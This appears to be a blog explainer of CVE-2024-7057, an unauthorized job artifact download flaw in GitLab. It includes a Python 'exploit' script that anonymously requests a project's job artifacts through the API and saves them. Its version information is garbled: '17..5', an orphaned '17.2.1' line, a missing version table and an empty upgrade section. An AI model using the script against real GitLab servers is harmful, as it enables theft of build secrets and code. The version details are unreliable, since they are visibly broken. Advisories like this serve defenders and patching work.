CVE-2024-7057 - GitLab Job Artifact Exposure Vulnerability Explained

CVE-2024-7057 is a recently disclosed information disclosure vulnerability affecting GitLab Community Edition (CE) and Enterprise Edition (EE). It allows unauthorized users to access CI/CD job artifacts, which may contain sensitive information such as logs, compiled binaries, secrets, and more. This vulnerability impacts versions of GitLab starting from 16.7 and continues in all subsequent releases up to 17..5, 17.1.3, and 17.2.1 respectively.

In this post, we’ll explain what this vulnerability is, how it works, show you an example of exploiting it, link to original sources, and provide remediation guidance. This article is written in a simple style for broad understanding.

What Is CVE-2024-7057?

CVE-2024-7057 is an information disclosure vulnerability in GitLab. In simple terms: it allows users with insufficient permissions—users who should NOT have access—to view and download job artifacts generated by CI/CD pipelines. Artifacts can include test results, build logs, compiled applications, or other sensitive data generated during automated jobs.

Why Is This a Problem?

Job artifacts often contain valuable or sensitive information. If exposed, malicious users or curious attackers can use these to learn about project internals, gain access to confidential code, or even discover further vulnerabilities.

17.2.1

If you are running any GitLab release in these version ranges, you are vulnerable.

How Does the Vulnerability Work?

Normally, GitLab uses Access Control Lists (ACLs) and permissions to restrict who can view CI/CD job artifacts. Due to a bug, artifacts could be retrieved even by users who do not have the authorization.

What Actually Happened?

- Flawed Permissions Check: The permission logic failed to correctly check if the user had the right role before allowing them to access artifacts for certain jobs or projects.
- Direct URL Access: By crafting a proper HTTP GET request for a known artifact URL, a low-privilege user (or even a guest, in some cases) could download the job artifact without approval.

Practical Exploit Example

Below is an example scenario using Python that demonstrates how an unauthorized user could exploit this flaw to download artifacts.

The attacker knows or can infer the project ID and a job ID with interesting artifacts.

- The vulnerable GitLab server is running (for example) at https://gitlab.example.com.

Exploit Code Snippet

import requests

# Target GitLab instance URL and known job artifact IDs
GITLAB_URL = 'https://gitlab.example.com'
PROJECT_ID = 123  # Replace with actual project ID
JOB_ID = 456      # Replace with actual job ID

# Unprivileged user's session (no or limited permissions)
session = requests.Session()
# For an anonymous attack, don't authenticate

# Construct the artifact download URL
artifact_url = f"{GITLAB_URL}/api/v4/projects/{PROJECT_ID}/jobs/{JOB_ID}/artifacts"

response = session.get(artifact_url)

if response.status_code == 200:
    # Artifact downloaded successfully!
    with open('artifact.zip', 'wb') as file:
        file.write(response.content)
    print('Artifact was downloaded without proper authorization!')
else:
    print(f"Failed to download: status code {response.status_code}")

Note: This script simply retrieves the artifact as a ZIP file. On properly secured GitLab versions, unauthorized requests would return a 403 Forbidden.

1. Upgrade GitLab!

Immediate action:

17.2.1 (or later)

👉 See GitLab Security Releases June 2024 for direct links.

Review your artifact storage: Check for public artifacts.

- Restrict pipeline logs and artifacts: Update your .gitlab-ci.yml to store only essential data as artifacts and restrict their exposure.

Audit user roles and permissions frequently.

- Remove unnecessary access for users, especially on public/open-source projects.

References

- GitLab Security Advisory - CVE-2024-7057
- CVE Record - CVE-2024-7057
- GitLab Release Blog
- SecLists.org Entry

Final Thoughts

CVE-2024-7057 underscores the importance of regular updates and careful security reviews for your DevOps pipelines. Even seemingly harmless artifacts can be goldmines for attackers. If your team uses GitLab, please patch now.

*Stay safe, and always keep your dependencies up to date!*

Timeline

Published on: 07/25/2024 01:15:10 UTC
Last modified on: 07/26/2024 15:55:10 UTC